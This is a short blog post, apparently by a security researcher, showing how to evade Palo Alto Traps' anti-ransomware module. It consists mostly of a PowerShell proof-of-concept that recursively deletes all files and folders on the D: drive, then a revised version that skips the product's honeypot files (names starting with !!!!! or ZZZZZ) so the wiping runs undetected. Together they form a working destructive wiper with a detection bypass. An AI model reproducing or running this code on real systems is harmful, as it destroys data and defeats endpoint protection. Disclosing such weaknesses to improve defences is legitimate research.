Evading Palo Alto Traps Anti-Ransomware Protection (OBSOLETE)

Standard

This piece could be the shortest article you have/will read today, so don’t blink:

The PoC script below will mimic a ransomware, it will wipe the whole D: drive except some pre-excluded files and folders ($TrustedFiles and $TrustedFolders).
When running this script, Traps (version 4.1.0 and above, with the Anti-Ransomware module activated) will flag it as a ransomware and kills the process, that is because it is performing bulk files/folders modification:

$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}

	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}

}

foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if (($Fil -eq $fileToCheck){
			$deletefile = 0
		}
	}

	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}

}



So how Traps detects that?

Simply it creates honeypot files in all directories, with names like !!!!!2686401769.jpg and ZZZZZ1920832159.png.

Below is the list of all the file names:




So we edit our PoC script to exclude everything that starts with !!!!! or ZZZZZ, and it just works, Traps will mark it as a benign process:


$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}

	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}

}

foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if (($Fil -eq $fileToCheck) -or ($fileToCheck -match "^ZZZZZ") -or ($fileToCheck -match "^!!!!!")){
			$deletefile = 0
		}
	}

	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}

}



Is it that easy or is there something I’m missing?

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s